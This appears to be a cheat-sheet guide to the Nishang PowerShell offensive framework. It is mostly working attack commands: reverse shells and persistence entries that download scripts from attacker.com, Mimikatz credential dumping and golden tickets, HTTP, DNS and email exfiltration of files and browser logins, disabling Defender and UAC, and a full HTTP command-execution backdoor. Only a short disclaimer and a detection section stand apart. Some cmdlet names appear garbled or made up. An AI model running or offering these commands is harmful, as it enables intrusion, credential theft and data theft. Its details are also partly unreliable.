Nishang
Overview
Nishang is a comprehensive PowerShell offensive security framework developed for red team operations and penetration testing. It provides a collection of scripts and tools for reconnaissance, exploitation, and post-exploitation activities on Windows systems. Nishang leverages PowerShell’s native capabilities to execute attacks directly from memory without writing to disk, making it difficult to detect via traditional endpoint protection.
The framework includes backdoors, credential harvesters, information gatherers, privilege escalation exploits, and lateral movement tools. It’s designed for authorized penetration testing and red team exercises in controlled environments.
Installation
Clone Repository
git clone https://github.com/samratashok/nishang.git
cd nishangDirectory Structure
nishang/
├── Antak-WebShell/
├── Apphunter/
├── Backdoors/
├── Escalation/
├── Execution/
├── Exfiltration/
├── Gather/
├── Lateral-Movement/
├── MITM/
├── Persistence/
├── Powerpreter/
├── Shells/
└── Utils/PowerShell Requirements
# Check PowerShell version
$PSVersionTable.PSVersion
# Recommended: PowerShell 3.0 or later
# Windows 7+: Get Update for .NET Framework and PowerShellDisable Execution Policy (if needed)
# Bypass execution policy for current session
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope CurrentUser
powershell -ExecutionPolicy BypassCore Modules and Tools
| Module | Category | Purpose |
|---|---|---|
| Invoke-PowerShellTcp | Backdoor/Shell | Reverse PowerShell shell |
| Invoke-PowerShellIcmp | Backdoor/Shell | ICMP-based reverse shell |
| Invoke-PsGcat | Backdoor/Shell | DNS exfiltration shell |
| Invoke-PowerShellUsb | Backdoor/Shell | USB-based persistence |
| Copy-VSS | Exfiltration | Extract copies of files via VSS |
| Invoke-CredentialInjection | Post-Exploitation | Inject credentials into processes |
| Get-Information | Reconnaissance | Gather system information |
| Get-WLAN-Keys | Credential Theft | Extract wireless network passwords |
| Invoke-Mimikatz | Credential Dumping | Dump credentials from memory |
| Invoke-Kerberoast | Privilege Escalation | Extract Kerberos tickets |
| Invoke-TokenDuplication | Privilege Escalation | Token impersonation |
| Invoke-ServiceAbuse | Lateral Movement | Abuse Windows services for movement |
| Invoke-PSRemoting | Lateral Movement | Use PS remoting for lateral movement |
Remote Shells and Backdoors
Basic Reverse Shell
# In Nishang/Shells/ directory
# On attacker machine - start listener
nc -lvnp 4444
# On target - execute reverse shell
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"ICMP Reverse Shell
# Uses ICMP packets for stealth
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress 192.168.1.100"DNS Tunneling Shell (Invoke-PsGcat)
# Exfiltrate data over DNS
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PsGcat.ps1'); Invoke-PsGcat -Command 'whoami' -Domain attacker.com"WebShell - Antak
# Web-based shell in IIS
# Upload Antak-WebShell files to IIS directory
# Access via: http://target/antak/
# Provides GUI PowerShell execution interfaceHTTP-based Reverse Shell
# Alternative to netcat for reverse communication
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellHTTP.ps1'); Invoke-PowerShellHTTP -Reverse -IPAddress 192.168.1.100 -Port 80"Reconnaissance and Information Gathering
System Information Collection
# Load Nishang module
. ./Gather/Get-Information.ps1
Get-InformationComprehensive System Enumeration
# Gather all system details
Get-Information | Format-List
# Output includes:
# - OS version
# - System architecture
# - Installed software
# - Network configuration
# - Logged-in users
# - Security softwareNetwork Information
# Network adapter details
Get-NetAdapter
Get-NetIPConfiguration
# Active connections
netstat -ano
Get-NetTCPConnectionUser and Group Enumeration
# Local users
Get-LocalUser
# Local groups
Get-LocalGroup
# Group members
Get-LocalGroupMember -Name "Administrators"
# Domain info (if joined)
Get-ADUser -Filter *
Get-ADGroup -Filter *Wireless Credentials
# Extract saved WLAN passwords
. ./Gather/Get-WLAN-Keys.ps1
Get-WLAN-Keys
# Displays: SSID, Network Type, Authentication, Encryption, PasswordBrowser and Credential Enumeration
# Chrome/Edge saved credentials and history
Get-ChromeLogins
Get-ChromeHistory
# Firefox credentials
Get-FirefoxLogins
# Stored credentials
cmdkey /list
Get-CredentialPost-Exploitation
Credential Extraction and Dumping
Invoke-Mimikatz Integration
# Dump credentials from memory
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
# Extract NTLM hashes
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:CORP /ntlm:hash /run:cmd.exe"'
# Golden ticket creation
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.com /sid:S-1-5-21-x-x-x /krbtgt:hash /id:500"'Token Impersonation
# Load token impersonation module
. ./Escalation/Invoke-TokenDuplication.ps1
# Get available tokens
Get-ProcessToken
# Duplicate and impersonate token
Invoke-TokenDuplication -ProcessId 1234 -ImpersonationLevel ImpersonationCredential Injection
# Inject credentials into process
. ./Escalation/Invoke-CredentialInjection.ps1
# Inject and spawn process
Invoke-CredentialInjection -Target "notepad.exe" -Username "DOMAIN\Administrator" -Password "Password123" -Domain "DOMAIN"Privilege Escalation
UAC Bypass Techniques
# Various UAC bypass methods
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass -Technique "EventVwr"
# Other techniques:
# - Registry Modification
# - COM Handler Hijacking
# - Scheduled Task Abuse
# - Token DuplicationService Exploitation
# Abuse misconfigured services
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1
# Find vulnerable services
Get-Service | Where-Object {$_.StartType -eq "Disabled"}
# Abuse service for code execution
Invoke-ServiceAbuse -ServiceName "VulnerableService" -Command "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"Kerberoasting
# Extract service principal names (SPNs)
. ./Escalation/Invoke-Kerberoast.ps1
Invoke-Kerberoast
# Extract TGS tickets for offline cracking
Invoke-Kerberoast -OutputFormat HashCat
# Crack with hashcat
hashcat -m 13100 krb5_tgs_dump.txt wordlist.txtHot Potato Exploit
# Windows privilege escalation
# Combines NBNS spoofing and NTLM relay
. ./Escalation/Invoke-HotPotato.ps1
Invoke-HotPotatoLateral Movement
PowerShell Remoting
# Enable remoting (requires admin)
Enable-PSRemoting -Force
# Create PSSession to remote host
$session = New-PSSession -ComputerName remote.corp.com -Credential (Get-Credential)
# Execute commands
Invoke-Command -Session $session -ScriptBlock {whoami; hostname}
# Copy files over PSSession
Copy-Item -Path "C:\local\file.txt" -Destination "C:\remote\" -ToSession $sessionWMI-Based Lateral Movement
# Execute commands via WMI
$cred = Get-Credential
$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName remote.corp.com -SessionOption $options -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd /c powershell..."}Service Abuse for Lateral Movement
# Find and abuse services on remote host
. ./Lateral-Movement/Invoke-ServiceAbuse.ps1
Invoke-ServiceAbuse -ComputerName "remote.corp.com" -ServiceName "vulnerable-service"File Copy Exfiltration
# Copy files using Volume Shadow Copy (VSS)
. ./Exfiltration/Copy-VSS.ps1
Copy-VSS -FileName "C:\Windows\System32\drivers\etc\hosts"
# Exfiltrate sensitive files
Copy-VSS -FileName "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Login Data"Persistence
Registry Persistence
# Add run key for startup persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"Scheduled Task Persistence
# Create scheduled task running as SYSTEM
$trigger = New-ScheduledTaskTrigger -AtStartup
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
Register-ScheduledTask -TaskName "Windows Update" -Trigger $trigger -Action $action -RunLevel HighestWindows Service Installation
# Create malicious Windows service
# Requires admin privileges
New-Service -Name "UpdateService" -BinaryPathName "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')" -StartupType AutomaticStartup Folder Persistence
# Place script in startup folder
Copy-Item -Path "shell.ps1" -Destination "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"WMI Event Subscription
# WMI-based persistence (difficult to detect)
$EventFilter = Set-WmiInstance -Class __EventFilter -Namespace "root\cimv2" -Arguments @{Name="Updater"; EventNamespace="root\cimv2"; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$EventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\cimv2" -Arguments @{Name="Updater"; CommandLineTemplate="powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\cimv2" -Arguments @{Filter=$EventFilter; Consumer=$EventConsumer}Exfiltration Techniques
Data Exfiltration Methods
# DNS-based exfiltration
. ./Exfiltration/Invoke-PsGcat.ps1
Invoke-PsGcat -Command "Get-ChildItem C:\ -Recurse | ConvertTo-Json" -Domain attacker.com
# HTTP-based exfiltration
$data = Get-ChildItem C:\ -Recurse
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-WebRequest -Uri "http://attacker.com/exfil" -Method POST -Body ($data | ConvertTo-Json)
# Email-based exfiltration
$smtp = New-Object Net.Mail.SmtpClient("attacker.com")
$mail = New-Object System.Net.Mail.MailMessage("attacker@attacker.com","admin@attacker.com")
$mail.Subject = "Stolen Data"
$mail.Body = (Get-ChildItem C:\Users\ | ConvertTo-Json)
$smtp.Send($mail)File Compression Before Exfiltration
# Compress sensitive files
$files = Get-ChildItem -Path "C:\Users\Administrator\Documents" -Recurse
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\archive.zip"
# Exfiltrate compressed archive
$file = Get-Item "C:\Temp\archive.zip"
$request = [System.Net.WebRequest]::Create("http://attacker.com/upload")
# ... send file ...Defense Evasion
Anti-Virus Evasion
# Execute in-memory to avoid disk detection
IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')
# Obfuscate PowerShell commands
Invoke-Obfuscation -Type All -Path ".\script.ps1"
# Use CertUtil for file download (avoid WebClient)
certutil -urlcache -split -f "http://attacker.com/file.exe" output.exeProcess Injection and Hollowing
# Inject shellcode into process memory
# Uses low-level APIs to bypass detection
. ./Execution/Invoke-ShellcodeMmap.ps1
Invoke-ShellcodeMmap -Shellcode @(0x90,0x90,...)
# Process hollowing for parent process spoofing
. ./Execution/Invoke-ProcessHollowing.ps1
Invoke-ProcessHollowing -ParentProcess "explorer.exe" -Shellcode $shellcodeRegistry Enumeration and Modification
# Modify Windows Defender registry
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableRealtimeMonitoring" -Value 1
# Disable UAC
Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System" -Name "EnableLUA" -Value 0
# Modify Event Log settings
limitEventLogs -Log Security -MaxSize 1024000Utility Scripts
PowerShell Web Backdoor
# Simple HTTP-based backdoor
$listener = [System.Net.HttpListener]::new()
$listener.Prefixes.Add("http://+:80/")
$listener.Start()
while($true) {
$context = $listener.GetContext()
$command = $context.Request.QueryString["cmd"]
$output = Invoke-Expression $command | Out-String
$response = $context.Response
$buffer = [System.Text.Encoding]::UTF8.GetBytes($output)
$response.ContentLength64 = $buffer.Length
$response.OutputStream.Write($buffer,0,$buffer.Length)
$response.Close()
}Information Wrapper Script
# Bundle multiple information gathering scripts
. ./Gather/Get-Information.ps1
. ./Gather/Get-WLAN-Keys.ps1
. ./Gather/Invoke-Mimikatz.ps1
$results = @{
SystemInfo = Get-Information
WLANKeys = Get-WLAN-Keys
Credentials = Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
}
$results | ConvertTo-Json | Out-File -Path "C:\Temp\enum.json"Real-World Attack Scenarios
Initial Access and Persistence
# 1. Initial compromise (reverse shell)
powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.100 -Port 4444"
# 2. Establish persistence
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Updater" -Value "powershell -ExecutionPolicy Bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# 3. Privilege escalation
. ./Escalation/Invoke-UACBypass.ps1
Invoke-UACBypass
# 4. Lateral movement
$cred = Get-Credential
Invoke-Command -ComputerName remote.corp.com -Credential $cred -ScriptBlock {whoami}Credential Dumping and Use
# 1. Dump credentials
. ./Gather/Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' > creds.txt
# 2. Extract plaintext passwords
Get-WLAN-Keys
# 3. Use for lateral movement
$cred = New-Object System.Management.Automation.PSCredential("DOMAIN\Admin", (ConvertTo-SecureString "Password" -AsPlainText -Force))Security Considerations
- Nishang is for authorized penetration testing only
- Obtain proper written authorization before use
- Use in isolated lab environments or authorized networks
- Monitor for suspicious PowerShell execution
- Nishang scripts may be detected by EDR/AV solutions
- Maintain audit trails and documentation
- Follow responsible disclosure practices
Detection and Defensive Measures
PowerShell Logging
# Enable PowerShell module logging
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
# Enable script block logging
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Check PowerShell history
Get-PSReadlineAsyncJob
(Get-PSReadlineOption).HistorySavePathDetection Queries
# Hunt for suspicious PowerShell execution
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688; Data='-ExecutionPolicy Bypass'}
# Look for remote PowerShell sessions
Get-WinEvent -FilterHashtable @{LogName='Windows PowerShell'; ID=600}Related Tools
- Metasploit - General penetration testing framework
- Empire - Alternative PowerShell exploitation framework
- PoshC2 - Command and control over HTTP(S)
- Covenant - .NET-based command and control
- Mimikatz - Credential extraction tool (often integrated)
References
- Nishang GitHub: https://github.com/samratashok/nishang
- PowerShell documentation: https://docs.microsoft.com/powershell
- Red team operational guides
- Authorized penetration testing methodologies
- MITRE ATT&CK framework for attack techniques